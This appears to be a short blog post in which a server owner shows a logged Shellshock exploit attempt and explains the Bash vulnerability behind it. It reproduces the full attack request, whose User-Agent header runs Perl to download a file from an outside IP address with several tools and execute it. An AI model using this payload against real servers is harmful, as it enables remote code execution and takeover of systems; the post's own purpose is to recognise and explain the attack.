bash

How a Shellshock exploit attempt looks like

One of my HTTP servers hosted on an Amazon EC2 receives regularly strange requests like these:   One such request looks like this: GET /cgi-bin/php5 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plainrnrnXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* “);’ Host: 52.10.211.77 Connection: Close   The IP address in the screen shot is from Austria (http://whois.domaintools.com/212.152.181.211) I received similar requests from the Netherlands, France and UK. Unfortunately, I configured the HTTP server to erase old logs, so I can’t say how many access I got and from which locations. This is a variant of the Shellshock exploit discovered in September last year. How do you know that this is the Shellshock exploit? By seeing this text: User-Agent: () { :;};/usr/bin/perl -e   The Shellshock vulnerabilities affect Bash, a program that various Unix-based systems use to execute command lines and command scripts. It is often installed as the system’s default command-line interface. Bash is free software, developed collaboratively and overseen since 1992 on a volunteer basis by Chet Ramey, a professional software architect. Analysis of the…


%d bloggers like this: